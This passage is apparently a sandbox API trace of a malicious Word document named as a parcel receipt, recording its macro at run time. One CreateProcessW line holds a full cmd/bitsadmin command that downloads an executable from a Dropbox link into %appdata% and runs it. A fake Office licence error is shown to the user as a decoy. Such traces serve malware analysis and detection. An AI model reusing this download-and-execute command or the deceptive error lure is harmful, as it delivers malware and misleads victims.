lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="h", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="h\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="o", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="o\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="H", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="H\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="g", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="g\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="l\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b6f8, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b7b8, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0017.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="w", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="w\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0017.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0017.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=1, lpMultiByteStr=0x2867d0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x96Êðþ\x07", lpUsedDefaultChar=0x0) returned 1 [0017.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867a0, cbMultiByte=1, lpWideCharStr=0x778b848, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0017.159] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuoldw.exe &start %appdata%\\iuoldw.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x286a00*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2869e0 | out: lpCommandLine="cmd.exe /c \"waitfor /t 5 YKERQ & bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 %appdata%\\iuoldw.exe &start %appdata%\\iuoldw.exe\"", lpProcessInformation=0x2869e0*(hProcess=0x9b8, hThread=0x9b4, dwProcessId=0xa50, dwThreadId=0xa54)) returned 1 [0017.274] GetLastError () returned 0x0 [0017.274] WaitForInputIdle (hProcess=0x9b8, dwMilliseconds=0x2710) returned 0xffffffff [0017.275] CloseHandle (hObject=0x9b4) returned 1 [0017.275] CloseHandle (hObject=0x9b8) returned 1 [0017.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Error 19874: You must have Office Professional Edition to read this content, please upgrade your licence. Visit www.microsoft.com for help", cchWideChar=-1, lpMultiByteStr=0xa39c490, cbMultiByte=276, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Error 19874: You must have Office Professional Edition to read this content, please upgrade your licence. Visit www.microsoft.com for help", lpUsedDefaultChar=0x0) returned 139 [0017.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Microsoft Word", cchWideChar=-1, lpMultiByteStr=0xa397f80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Word", lpUsedDefaultChar=0x0) returned 15 [0017.315] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x797e460 [0017.316] IMalloc:Free (This=0x7fefe9e5380, pv=0x797e460) [0017.316] MessageBoxIndirectA (lpmbp=0x286790*(cbSize=0x50, hwndOwner=0x101b2, hInstance=0x0, lpszText="Error 19874: You must have Office Professional Edition to read this content, please upgrade your licence. Visit www.microsoft.com for help", lpszCaption="Microsoft Word", dwStyle=0x0, lpszIcon=0x0, dwContextHelpId=0x0, lpfnMsgBoxCallback=0x0, dwLanguageId=0x0)) returned 1 [0017.851] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x797e9e0 [0017.851] IMalloc:Free (This=0x7fefe9e5380, pv=0x797e9e0) [0017.860] IMalloc:Free (This=0x7fefe9e5380, pv=0x7725400) [0017.867] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Open") returned 0x1089c1 [0017.867] IUnknown:AddRef (This=0x788e200) returned 0x12 [0017.867] strcpy_s (in: _Dst=0x79e1aa0, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0017.867] strcpy_s (in: _Dst=0x79e1af0, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0017.868] IUnknown:AddRef (This=0x72e0930) returned 0xc [0017.868] strcpy_s (in: _Dst=0x79e1b60, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0017.868] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79dfb70 [0017.868] strcpy_s (in: _Dst=0x79dfb98, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0017.868] IUnknown:AddRef (This=0x72df850) returned 0x8 [0017.868] strcpy_s (in: _Dst=0x79dfc08, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0017.868] strcpy_s (in: _Dst=0x79dfc30, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0017.869] IUnknown:AddRef (This=0x788df30) returned 0x5 [0017.869] strcpy_s (in: _Dst=0x79dfca0, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0017.869] strcpy_s (in: _Dst=0x79dfce8, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0017.869] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x118) returned 0xbd0c3e0 [0017.869] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0x79dfdc0 [0017.869] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xe08) returned 0xbd7ff30 [0017.870] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x797e900 [0017.870] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10) returned 0x797e940 [0017.870] strcpy_s (in: _Dst=0x79dfe18, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0017.870] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xc8) returned 0x77f5d10 [0017.870] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x230) returned 0xbcbd280 [0017.870] IMalloc:Free (This=0x7fefe9e5380, pv=0x797e980) [0017.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x287420, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0017.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0017.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x287420, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0017.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0017.871] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Open") returned 0x1089c1 [0018.720] GetCapture () returned 0x0 [0018.720] GetCursorPos (in: lpPoint=0x28f560 | out: lpPoint=0x28f560*(x=897, y=514)) returned 1 [0018.720] WindowFromPoint (Point=0x20200000381) returned 0x301f2 [0018.720] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x958 [0018.720] SendMessageA (hWnd=0x301f2, Msg=0x84, wParam=0x0, lParam=0x2020381) returned 0x1 [0018.720] SendMessageA (hWnd=0x301f2, Msg=0x20, wParam=0x301f2, lParam=0x2000001) returned 0x0 [0235.296] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Close") returned 0x105c37 [0235.331] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0xbf86000 [0235.331] IMalloc:Free (This=0x7fefe9e5380, pv=0xbf86000) [0235.777] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0xbf8b2a0 [0235.777] IMalloc:Free (This=0x7fefe9e5380, pv=0xbf8b2a0) [0236.075] CExposedDocFile::CreateStorage () returned 0x0 [0236.075] CExposedDocFile::CreateStream () returned 0x0 [0236.075] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0xbd50760 [0236.075] CExposedStream::AddRef () returned 0x2 [0236.075] CExposedStream::Release () returned 0x1 [0236.075] CExposedStream::Seek () returned 0x0 [0236.075] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x784e0e0 [0236.075] CExposedStream::Seek () returned 0x0 [0236.075] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x784eb50 [0236.075] CExposedStream::Seek () returned 0x0 [0236.075] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x784e090 [0236.076] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0236.076] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x778b728, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0236.076] CExposedStream::Seek () returned 0x0 [0236.076] CExposedStream::Seek () returned 0x0 [0236.076] CExposedStream::Seek () returned 0x0 [0236.076] CExposedStream::Seek () returned 0x0 [0236.076] CExposedStream::Seek () returned 0x0 [0236.076] CExposedStream::Seek () returned 0x0 [0236.077] CExposedStream::Write () returned 0x0 [0236.077] CExposedStream::Seek () returned 0x0 [0236.077] CExposedStream::AddRef () returned 0x2 [0236.077] CExposedStream::Write () returned 0x0 [0236.077] CExposedStream::Release () returned 0x1 [0236.077] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd50760) [0236.077] CExposedStream::Seek () returned 0x0 [0236.077] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x2028) returned 0xc061c90 [0236.077] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10020*=0x10128) returned 0xc159280 [0236.077] CExposedStream::AddRef () returned 0x2 [0236.077] CExposedStream::Write () returned 0x0 [0236.077] CExposedStream::Release () returned 0x1 [0236.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0236.077] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xd) returned 0xbf8e480 [0236.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0xbf8e480, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f3c0 | out: _Dst=0x7fef107073a) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070745, _DstSizeInBytes=0x3eb, _Src=0xbf8e480 | out: _Dst=0x7fef1070745) returned 0x0 [0236.077] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0236.077] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x778b728, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0236.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1Normal.ThisDocument", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0236.077] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x15) returned 0xbf8e480 [0236.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="1Normal.ThisDocument", cchWideChar=21, lpMultiByteStr=0xbf8e480, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1Normal.ThisDocument", lpUsedDefaultChar=0x0) returned 21 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f2d8 | out: _Dst=0x7fef107073a) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070745, _DstSizeInBytes=0x3eb, _Src=0xbf8e480 | out: _Dst=0x7fef1070745) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f478 | out: _Dst=0x7fef107073a) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107074f, _DstSizeInBytes=0x3e1, _Src=0x7fef102ef58 | out: _Dst=0x7fef107074f) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f2f0 | out: _Dst=0x7fef107073a) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070749, _DstSizeInBytes=0x3e7, _Src=0x7fef102ef58 | out: _Dst=0x7fef1070749) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f3c8 | out: _Dst=0x7fef107073a) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107074d, _DstSizeInBytes=0x3e3, _Src=0x7fef102f21c | out: _Dst=0x7fef107074d) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f320 | out: _Dst=0x7fef107073a) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070747, _DstSizeInBytes=0x3e9, _Src=0x7fef102f21c | out: _Dst=0x7fef1070747) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f3f0 | out: _Dst=0x7fef107073a) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107074f, _DstSizeInBytes=0x3e1, _Src=0x7fef102f21c | out: _Dst=0x7fef107074f) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f300 | out: _Dst=0x7fef107073a) returned 0x0 [0236.077] _mbscpy_s (in: _Dst=0x7fef107074c, _DstSizeInBytes=0x3e4, _Src=0x7fef102f21c | out: _Dst=0x7fef107074c) returned 0x0 [0236.078] CExposedStream::Write () returned 0x0 [0236.078] CExposedStream::Commit () returned 0x0 [0236.080] CExposedStream::Release () returned 0x0 [0236.080] CExposedDocFile::CreateStream () returned 0x0 [0236.081] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0xbd50760 [0236.081] CExposedStream::AddRef () returned 0x2 [0236.081] CExposedStream::Release () returned 0x1 [0236.081] CExposedStream::Seek () returned 0x0 [0236.081] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x784dfe0 [0236.081] CExposedStream::Seek () returned 0x0 [0236.081] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x784df60 [0236.081] CExposedStream::Seek () returned 0x0 [0236.081] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0x784e900 [0236.081] CExposedStream::Seek () returned 0x0 [0236.082] CExposedStream::Write () returned 0x0 [0236.082] CExposedStream::Write () returned 0x0 [0236.082] CExposedStream::Seek () returned 0x0 [0236.082] CExposedStream::Seek () returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x280f88, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0236.082] _ultow_s (in: _Value=0xffff, _Buffer=0x280f8e, _BufferCount=0xa, _Radix=16 | out: _Buffer="ffff") returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x77c3878, _SizeInWords=0x46, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc" | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x77c38ec, _SizeInWords=0xb, _Source="055c2b45a3" | out: _Destination="055c2b45a3") returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x7725458, _SizeInWords=0x13, _Source="*\\Rffff*" | out: _Destination="*\\Rffff*") returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x7725468, _SizeInWords=0xb, _Source="055c2b45a3" | out: _Destination="055c2b45a3") returned 0x0 [0236.082] CExposedStream::Seek () returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x280f88, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0236.082] _ultow_s (in: _Value=0x0, _Buffer=0x280f8e, _BufferCount=0xa, _Radix=16 | out: _Buffer="0") returned 0x0 [0236.082] _ultow_s (in: 